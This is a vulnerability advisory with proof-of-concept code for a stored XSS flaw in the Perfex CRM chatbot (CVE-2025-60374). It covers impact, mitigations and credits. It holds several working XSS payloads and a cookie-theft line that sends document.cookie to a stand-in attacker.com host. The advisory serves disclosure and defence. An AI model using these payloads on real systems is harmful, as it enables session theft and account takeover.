CVE-2025-60374 PoC — Perfex CRM 安全漏洞

来源

关联漏洞

Description

CVE-2025-60374: Stored Cross-Site Scripting (XSS) in Perfex CRM Chatbot

介绍

# CVE-2025-60374
CVE-2025-60374: Stored Cross-Site Scripting (XSS) in Perfex CRM Chatbot

> **⚠️ Security Advisory**  
> A critical Stored Cross-Site Scripting vulnerability in Perfex CRM's chatbot feature

[![CVE](https://img.shields.io/badge/CVE-2025--60374-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)
[![Severity](https://img.shields.io/badge/Severity-High-orange)]()
[![CWE](https://img.shields.io/badge/CWE-79-blue)](https://cwe.mitre.org/data/definitions/79.html)

---

## 📋 Overview

A stored cross-site scripting (XSS) vulnerability in the chatbot component of Perfex CRM, prior to version 3.3.1, allows attackers to inject arbitrary JavaScript code through chat messages. The malicious payload is stored in the application database and executed in the browsers of users viewing the chat conversation, enabling session token theft, unauthorized actions on behalf of victims, and other client-side attacks.

## 🎯 Affected Versions

- **Product:** Perfex CRM
- **Vendor:** Perfex CRM
- **Vulnerable Versions:** < 3.3.1
- **Fixed Version:** 3.3.1+

## 🔍 Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-60374 |
| **Type** | Stored Cross-Site Scripting (XSS) |
| **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) |
| **Attack Vector** | Network/Remote |
| **Authentication** | Required (Low Privilege) |
| **User Interaction** | None to Minimal |
| **Discoverer** | Ajansha Shankar |

### Description

The chatbot's message parameter in Perfex CRM lacks proper input sanitization and output encoding. When users submit messages through the chatbot interface, malicious HTML/JavaScript payloads are stored in the database without adequate filtering and subsequently rendered without proper escaping, leading to code execution in other users' browsers.

### Root Cause

- ❌ Insufficient input validation on chatbot message parameter
- ❌ Missing output encoding when rendering stored messages
- ❌ Session cookies not marked as `HttpOnly`
- ❌ Lack of Content Security Policy (CSP)

## 💥 Impact

### Security Implications

- **🔓 Session Hijacking:** Attackers can steal session tokens via `document.cookie` access
- **👤 Account Takeover:** Complete compromise of victim accounts
- **🎭 Privilege Escalation:** Administrator account compromise if admin views malicious message
- **📊 Data Exfiltration:** Access to sensitive information in user's browser context
- **🎪 Phishing:** Ability to modify page content and redirect users

### CIA Triad Assessment

| Factor | Impact | Explanation |
|--------|--------|-------------|
| **Confidentiality** | 🔴 HIGH | Session tokens and sensitive data can be stolen |
| **Integrity** | 🔴 HIGH | Unauthorized actions can be performed as the victim |
| **Availability** | 🟡 LOW | Limited impact on system availability |

## 🧪 Proof of Concept

### PoC 1: Basic Image XSS
```html
<img src=x onerror=alert('XSS executed!')>
```

### PoC 2: Interactive Button XSS
```html
<button onclick=alert('Click executed!')>Click here</button>
```

### PoC 3: Auto-playing Embedded Content
```html
<iframe width="560" height="315" 
src="<link>" 
frameborder="0" allow="accelerometer; autoplay; clipboard-write; 
encrypted-media; gyroscope; picture-in-picture" allowfullscreen>
</iframe>
```

### PoC 4: Event-based XSS
```html
<meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')>
2 out of 10
</meter>
```

### Real-World Attack Scenario

**Cookie Theft Example:**
```javascript
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
```

This payload would send the victim's session cookie to an attacker-controlled server, enabling complete account takeover.

## 🛡️ Mitigation

### For End Users

1. **✅ Upgrade Immediately:** Update to Perfex CRM v3.3.1 or later
2. **🔍 Audit Messages:** Review chatbot history for suspicious HTML/JavaScript content
3. **🔄 Reset Sessions:** Force all users to re-authenticate after patching
4. **📝 Monitor Logs:** Check for unusual chatbot activity

### For Developers

#### Immediate Fixes
```php
// Input Sanitization Example
$message = htmlspecialchars($input_message, ENT_QUOTES, 'UTF-8');

// Output Encoding Example
echo htmlspecialchars($stored_message, ENT_QUOTES, 'UTF-8');
```

#### Long-term Security Improvements

1. **Content Security Policy (CSP)**
```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
```

2. **HttpOnly Cookies**
```php
setcookie('session', $value, [
    'httponly' => true,
    'secure' => true,
    'samesite' => 'Strict'
]);
```

3. **Input Validation Library**
```php
// Use DOMPurify, HTML Purifier, or similar
$clean_html = $purifier->purify($dirty_html);
```

## 📚 References

- [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/attacks/xss/)
- [CVE-2025-60374 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)


## 👤 Credits

**Discovered by:** 
[Ajansha Shankar](https://www.linkedin.com/in/ajansha-shankar/)
, [Ahamed Yaseen](https://www.linkedin.com/in/ahamed-yaseen-a1216b93/)

文件快照

 [4.0K]  /data/pocs/71a94b4ab2dde54a5c5854706c611f6e1d7327c9
└── [5.1K]  README.md

1 directory, 1 file

备注